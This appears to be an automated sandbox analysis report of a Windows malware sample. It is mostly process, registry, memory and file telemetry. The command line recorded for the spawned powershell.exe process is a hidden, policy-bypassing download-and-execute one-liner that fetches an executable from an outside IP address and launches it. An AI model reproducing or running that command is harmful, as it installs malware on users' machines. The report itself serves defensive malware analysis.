1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc17143270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\Nd9E1FYi\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ffc17148940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ffc17147460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 |
|
1 | |
| Environment | Get Environment String | name = appdAta, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
2 | |
| File | Get Info | filename = powershell.exe, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xe98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #5: powershell.exe
1453
51
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'); staRt-ProceSS 'C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe' |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:24, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe98 |
| Parent PID | 0xe6c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E9C
0x
EF0
0x
EF4
0x
EF8
0x
F24
0x
F28
0x
F30
0x
F34
0x
F40
0x
F64
0x
F68
0x
F6C
0x
F70
0x
F74
0x
F94
0x
F98
0x
FB0
0x
FB4
0x
FD4
0x
FE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x0000002147430000 | 0x2147430000 | 0x21474affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000021474b0000 | 0x21474b0000 | 0x214752ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000002147530000 | 0x2147530000 | 0x21475affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000002147600000 | 0x2147600000 | 0x21477fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000002147800000 | 0x2147800000 | 0x214787ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000002147880000 | 0x2147880000 | 0x21478fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000002147900000 | 0x2147900000 | 0x214797ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000020800000000 | 0x20800000000 | 0x208013fffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000020801400000 | 0x20801400000 | 0x20801400fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000020801410000 | 0x20801410000 | 0x2080141ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000020801420000 | 0x20801420000 | 0x2080142ffff | Private Memory | - |
|
|
|
- |
| private_0x0000020801430000 | 0x20801430000 | 0x20801430fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000020801440000 | 0x20801440000 | 0x20801440fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000020801450000 | 0x20801450000 | 0x208014bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000208014c0000 | 0x208014c0000 | 0x208014cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000208014d0000 | 0x208014d0000 | 0x208014dffff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0x208014e0000 | 0x20801541fff | Memory Mapped File | Readable |
|
|
|
- |
| winnlsres.dll | 0x20801550000 | 0x20801554fff | Memory Mapped File | Readable |
|
|
|
- |
| winnlsres.dll.mui | 0x20801560000 | 0x2080156ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000020801570000 | 0x20801570000 | 0x20801570fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| tzres.dll | 0x20801580000 | 0x20801580fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| tzres.dll.mui | 0x20801580000 | 0x20801588fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000020801580000 | 0x20801580000 | 0x2080158ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000020801590000 | 0x20801590000 | 0x2080159ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000208015a0000 | 0x208015a0000 | 0x208016a2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000020801710000 | 0x20801710000 | 0x2080171ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000020801720000 | 0x20801720000 | 0x2081971ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rpcss.dll | 0x20819720000 | 0x208197fcfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000020819720000 | 0x20819720000 | 0x2081981ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000020819820000 | 0x20819820000 | 0x2081982ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000020819830000 | 0x20819830000 | 0x2081992ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000020819930000 | 0x20819930000 | 0x20819d2afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002087ecf0000 | 0x2087ecf0000 | 0x2087ed0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002087ecf0000 | 0x2087ecf0000 | 0x2087ecfffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002087ed00000 | 0x2087ed00000 | 0x2087ed06fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002087ed10000 | 0x2087ed10000 | 0x2087ed24fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002087ed30000 | 0x2087ed30000 | 0x2087ed33fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002087ed40000 | 0x2087ed40000 | 0x2087ed40fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002087ed50000 | 0x2087ed50000 | 0x2087ed51fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x2087ed60000 | 0x2087ee1dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002087ee20000 | 0x2087ee20000 | 0x2087ee26fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002087ee30000 | 0x2087ee30000 | 0x2087ee31fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002087ee40000 | 0x2087ee40000 | 0x2087ee40fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x2087ee50000 | 0x2087ee52fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002087ee60000 | 0x2087ee60000 | 0x2087ef5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002087ef60000 | 0x2087ef60000 | 0x2087ef60fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002087ef70000 | 0x2087ef70000 | 0x2087ef70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002087ef80000 | 0x2087ef80000 | 0x2087ef86fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002087f050000 | 0x2087f050000 | 0x2087f05ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002087f080000 | 0x2087f080000 | 0x2087f08ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002087f090000 | 0x2087f090000 | 0x2087f217fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002087f220000 | 0x2087f220000 | 0x2087f3a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x2087f3b0000 | 0x2087f6e6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00007df5ff7f0000 | 0x7df5ff7f0000 | 0x7ff5ff7effff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e4220000 | 0x7ff6e4220000 | 0x7ff6e422ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff6e4230000 | 0x7ff6e4230000 | 0x7ff6e42cffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00007ff6e42d0000 | 0x7ff6e42d0000 | 0x7ff6e43cffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff6e43d0000 | 0x7ff6e43d0000 | 0x7ff6e43f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| powershell.exe | 0x7ff6e4be0000 | 0x7ff6e4c57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffb9c760000 | 0x7ffb9c760000 | 0x7ffb9c76ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c770000 | 0x7ffb9c770000 | 0x7ffb9c77ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c780000 | 0x7ffb9c780000 | 0x7ffb9c80ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c810000 | 0x7ffb9c810000 | 0x7ffb9c87ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c880000 | 0x7ffb9c880000 | 0x7ffb9c8bffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c8c0000 | 0x7ffb9c8c0000 | 0x7ffb9c8cffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c8d0000 | 0x7ffb9c8d0000 | 0x7ffb9c8dffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c8e0000 | 0x7ffb9c8e0000 | 0x7ffb9c8effff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c8f0000 | 0x7ffb9c8f0000 | 0x7ffb9c8fffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c900000 | 0x7ffb9c900000 | 0x7ffb9c90ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c910000 | 0x7ffb9c910000 | 0x7ffb9c91ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c920000 | 0x7ffb9c920000 | 0x7ffb9c92ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c930000 | 0x7ffb9c930000 | 0x7ffb9c93ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c940000 | 0x7ffb9c940000 | 0x7ffb9c94ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c950000 | 0x7ffb9c950000 | 0x7ffb9c95ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c960000 | 0x7ffb9c960000 | 0x7ffb9c96ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c970000 | 0x7ffb9c970000 | 0x7ffb9c97ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c980000 | 0x7ffb9c980000 | 0x7ffb9c98ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c990000 | 0x7ffb9c990000 | 0x7ffb9c99ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c9a0000 | 0x7ffb9c9a0000 | 0x7ffb9c9affff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c9b0000 | 0x7ffb9c9b0000 | 0x7ffb9c9bffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c9c0000 | 0x7ffb9c9c0000 | 0x7ffb9c9cffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c9d0000 | 0x7ffb9c9d0000 | 0x7ffb9c9dffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c9e0000 | 0x7ffb9c9e0000 | 0x7ffb9c9effff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9c9f0000 | 0x7ffb9c9f0000 | 0x7ffb9c9fffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9ca00000 | 0x7ffb9ca00000 | 0x7ffb9ca0ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9ca10000 | 0x7ffb9ca10000 | 0x7ffb9ca1ffff | Private Memory | - |
|
|
|
- |
| private_0x00007ffb9ca20000 | 0x7ffb9ca20000 | 0x7ffb9ca2ffff | Private Memory | - |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7ffbf56c0000 | 0x7ffbf5721fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clrjit.dll | 0x7ffbf5730000 | 0x7ffbf5834fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.ni.dll | 0x7ffbf5840000 | 0x7ffbf595ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.dll | 0x7ffbf5e00000 | 0x7ffbf5e4cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7ffbf5e50000 | 0x7ffbf5f26fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7ffbf65a0000 | 0x7ffbf66fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7ffbf6700000 | 0x7ffbf6861fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7ffbf6870000 | 0x7ffbf7109fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.management.infrastructure.ni.dll | 0x7ffbf7110000 | 0x7ffbf71abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.numerics.ni.dll | 0x7ffbf71b0000 | 0x7ffbf71fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7ffbf7200000 | 0x7ffbf9208fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7ffbf92b0000 | 0x7ffbf935bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7ffbf9360000 | 0x7ffbf9ce0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7ffbf9cf0000 | 0x7ffbfa903fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7ffbfa910000 | 0x7ffbfbdd5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr120_clr0400.dll | 0x7ffbfbde0000 | 0x7ffbfbed6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clr.dll | 0x7ffbfbee0000 | 0x7ffbfc86dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7ffbfc950000 | 0x7ffbfc9e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7ffbfdbd0000 | 0x7ffbfdbfbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7ffbfddc0000 | 0x7ffbfde27fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldp.dll | 0x7ffc049f0000 | 0x7ffc049fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7ffc06ba0000 | 0x7ffc06bbdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x7ffc07fd0000 | 0x7ffc07fdbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7ffc08000000 | 0x7ffc08009fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7ffc0bfc0000 | 0x7ffc0bfd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| davhlpr.dll | 0x7ffc0bff0000 | 0x7ffc0bffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| davclnt.dll | 0x7ffc0c000000 | 0x7ffc0c01ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntlanman.dll | 0x7ffc0c020000 | 0x7ffc0c035fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| drprov.dll | 0x7ffc0c040000 | 0x7ffc0c04afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mpr.dll | 0x7ffc0c050000 | 0x7ffc0c06afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.diagnostics.tracing.ni.dll | 0x7ffc0caa0000 | 0x7ffc0caa4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x7ffc0f810000 | 0x7ffc0f825fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x7ffc12e30000 | 0x7ffc12e3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7ffc13030000 | 0x7ffc13063fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7ffc133a0000 | 0x7ffc133b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7ffc134c0000 | 0x7ffc134cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7ffc136a0000 | 0x7ffc136ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winsta.dll | 0x7ffc13830000 | 0x7ffc13885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x7ffc13950000 | 0x7ffc13978fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7ffc13a20000 | 0x7ffc13a33fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x7ffc13a40000 | 0x7ffc13a8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc13aa0000 | 0x7ffc13aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| windows.storage.dll | 0x7ffc13c50000 | 0x7ffc14293fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc14490000 | 0x7ffc144d2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc144e0000 | 0x7ffc14549fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ffc14550000 | 0x7ffc14737fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x7ffc14740000 | 0x7ffc147f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7ffc14800000 | 0x7ffc14942fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7ffc14950000 | 0x7ffc14a6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7ffc14a70000 | 0x7ffc15fcefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x7ffc15fd0000 | 0x7ffc1624cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7ffc16250000 | 0x7ffc162f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ffc164b0000 | 0x7ffc1654cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7ffc16660000 | 0x7ffc166bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7ffc167d0000 | 0x7ffc1680afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7ffc169e0000 | 0x7ffc16b65fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7ffc16fb0000 | 0x7ffc17070fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x7ffc17080000 | 0x7ffc17087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ffc17120000 | 0x7ffc171ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x7ffc171d0000 | 0x7ffc17325fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7ffc173a0000 | 0x7ffc173f1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ffc17400000 | 0x7ffc175c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
|
For performance reasons, the remaining 84 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\local\temp\4yreaw5k.md3.ps1 | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
|
|
| c:\users\nd9e1fyi\appdata\local\temp\dppe3wwf.ebw.psm1 | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
|
|
| c:\users\nd9e1fyi\appdata\roamingqtp35.exe | 278.51 KB |
MD5:
64fe3cc06265bca6cc175cecfc16fc2e
SHA1: 3f02ee202bd9040c25a3caf6af905345e458dc46 SHA256: 063cf82cd52acb6a0539a6ff59f72fb5de473293a06c470a92c6d35a151b73e9 |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\nd9e1fyi\appdata\local\microsoft\windows\powershell\commandanalysis\powershell_analysiscacheindex | 19.46 KB |
MD5:
209a126e4839093dbd140950fa232dff
SHA1: a98ffb3882b8f519eede39d32935578d6e4c774b SHA256: 8ff6e7821f5e3cea46c176bd5ccc51c24ac089de25cfa18412726d00c0d59b75 |
|
|
Threads
Thread 0xe9c
537
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN, value_name = ServiceStackVersion, data = 3.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
